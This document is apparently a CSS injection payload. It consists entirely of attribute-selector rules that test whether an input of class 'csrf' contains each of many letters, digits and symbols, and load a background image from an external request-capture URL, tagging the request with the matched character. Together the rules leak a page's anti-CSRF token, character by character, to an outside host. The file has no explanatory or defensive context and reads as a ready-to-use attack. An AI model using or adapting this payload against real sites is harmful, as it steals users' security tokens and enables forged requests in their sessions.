input.csrf[value*='a']{background: url(https://hookb.in/kxX9EpqyX2F6WYOD1Dr9?a);}
input.csrf[value*='z']{background: url(https://hookb.in/kxX9EpqyX2F6WYOD1Dr9?z);}
input.csrf[value*='e']{background: url(https://hookb.in/kxX9EpqyX2F6WYOD1Dr9?e);}
input.csrf[value*='r']{background: url(https://hookb.in/kxX9EpqyX2F6WYOD1Dr9?r);}
input.csrf[value*='t']{background: url(https://hookb.in/kxX9EpqyX2F6WYOD1Dr9?t);}
input.csrf[value*='y']{background: url(https://hookb.in/kxX9EpqyX2F6WYOD1Dr9?y);}
input.csrf[value*='u']{background: url(https://hookb.in/kxX9EpqyX2F6WYOD1Dr9?u);}
input.csrf[value*='i']{background: url(https://hookb.in/kxX9EpqyX2F6WYOD1Dr9?i);}
input.csrf[value*='o']{background: url(https://hookb.in/kxX9EpqyX2F6WYOD1Dr9?o);}
input.csrf[value*='p']{background: url(https://hookb.in/kxX9EpqyX2F6WYOD1Dr9?p);}
input.csrf[value*='q']{background: url(https://hookb.in/kxX9EpqyX2F6WYOD1Dr9?q);}
input.csrf[value*='s']{background: url(https://hookb.in/kxX9EpqyX2F6WYOD1Dr9?s);}
input.csrf[value*='d']{background: url(https://hookb.in/kxX9EpqyX2F6WYOD1Dr9?d);}
input.csrf[value*='f']{background: url(https://hookb.in/kxX9EpqyX2F6WYOD1Dr9?f);}
input.csrf[value*='g']{background: url(https://hookb.in/kxX9EpqyX2F6WYOD1Dr9?g);}
input.csrf[value*='h']{background: url(https://hookb.in/kxX9EpqyX2F6WYOD1Dr9?h);}
input.csrf[value*='j']{background: url(https://hookb.in/kxX9EpqyX2F6WYOD1Dr9?j);}
input.csrf[value*='k']{background: url(https://hookb.in/kxX9EpqyX2F6WYOD1Dr9?k);}
input.csrf[value*='l']{background: url(https://hookb.in/kxX9EpqyX2F6WYOD1Dr9?l);}
input.csrf[value*='m']{background: url(https://hookb.in/kxX9EpqyX2F6WYOD1Dr9?m);}
input.csrf[value*='w']{background: url(https://hookb.in/kxX9EpqyX2F6WYOD1Dr9?w);}
input.csrf[value*='x']{background: url(https://hookb.in/kxX9EpqyX2F6WYOD1Dr9?x);}
input.csrf[value*='c']{background: url(https://hookb.in/kxX9EpqyX2F6WYOD1Dr9?c);}
input.csrf[value*='v']{background: url(https://hookb.in/kxX9EpqyX2F6WYOD1Dr9?v);}
input.csrf[value*='b']{background: url(https://hookb.in/kxX9EpqyX2F6WYOD1Dr9?b);}
input.csrf[value*='n']{background: url(https://hookb.in/kxX9EpqyX2F6WYOD1Dr9?n);}
input.csrf[value*='_']{background: url(https://hookb.in/kxX9EpqyX2F6WYOD1Dr9?_);}
input.csrf[value*='-']{background: url(https://hookb.in/kxX9EpqyX2F6WYOD1Dr9?-);}
input.csrf[value*='*']{background: url(https://hookb.in/kxX9EpqyX2F6WYOD1Dr9?*);}
input.csrf[value*='/']{background: url(https://hookb.in/kxX9EpqyX2F6WYOD1Dr9?/);}
input.csrf[value*='{']{background: url(https://hookb.in/kxX9EpqyX2F6WYOD1Dr9?{);}
input.csrf[value*='}']{background: url(https://hookb.in/kxX9EpqyX2F6WYOD1Dr9?});}
input.csrf[value*='(']{background: url(https://hookb.in/kxX9EpqyX2F6WYOD1Dr9?();}
input.csrf[value*=')']{background: url(https://hookb.in/kxX9EpqyX2F6WYOD1Dr9?));}
input.csrf[value*='[']{background: url(https://hookb.in/kxX9EpqyX2F6WYOD1Dr9?[);}
input.csrf[value*=']']{background: url(https://hookb.in/kxX9EpqyX2F6WYOD1Dr9?]);}
input.csrf[value*='0']{background: url(https://hookb.in/kxX9EpqyX2F6WYOD1Dr9?0);}
input.csrf[value*='1']{background: url(https://hookb.in/kxX9EpqyX2F6WYOD1Dr9?1);}
input.csrf[value*='2']{background: url(https://hookb.in/kxX9EpqyX2F6WYOD1Dr9?2);}
input.csrf[value*='3']{background: url(https://hookb.in/kxX9EpqyX2F6WYOD1Dr9?3);}
input.csrf[value*='4']{background: url(https://hookb.in/kxX9EpqyX2F6WYOD1Dr9?4);}
input.csrf[value*='5']{background: url(https://hookb.in/kxX9EpqyX2F6WYOD1Dr9?5);}
input.csrf[value*='6']{background: url(https://hookb.in/kxX9EpqyX2F6WYOD1Dr9?6);}
input.csrf[value*='7']{background: url(https://hookb.in/kxX9EpqyX2F6WYOD1Dr9?7);}
input.csrf[value*='8']{background: url(https://hookb.in/kxX9EpqyX2F6WYOD1Dr9?8);}
input.csrf[value*='9']{background: url(https://hookb.in/kxX9EpqyX2F6WYOD1Dr9?9);}
input.csrf[value*='.']{background: url(https://hookb.in/kxX9EpqyX2F6WYOD1Dr9?.);}
input.csrf[value*='!']{background: url(https://hookb.in/kxX9EpqyX2F6WYOD1Dr9?!);}
input.csrf[value*='?']{background: url(https://hookb.in/kxX9EpqyX2F6WYOD1Dr9??);}
input.csrf[value*='^']{background: url(https://hookb.in/kxX9EpqyX2F6WYOD1Dr9?^);}
input.csrf[value*='+']{background: url(https://hookb.in/kxX9EpqyX2F6WYOD1Dr9?+);}
input.csrf[value*='-']{background: url(https://hookb.in/kxX9EpqyX2F6WYOD1Dr9?-);}
input.csrf[value*='à']{background: url(https://hookb.in/kxX9EpqyX2F6WYOD1Dr9?à);}
input.csrf[value*='è']{background: url(https://hookb.in/kxX9EpqyX2F6WYOD1Dr9?è);}
input.csrf[value*='é']{background: url(https://hookb.in/kxX9EpqyX2F6WYOD1Dr9?é);}
input.csrf[value*='ç']{background: url(https://hookb.in/kxX9EpqyX2F6WYOD1Dr9?ç);}
input.csrf[value*='#']{background: url(https://hookb.in/kxX9EpqyX2F6WYOD1Dr9?#);}
input.csrf[value*='&']{background: url(https://hookb.in/kxX9EpqyX2F6WYOD1Dr9?&);}
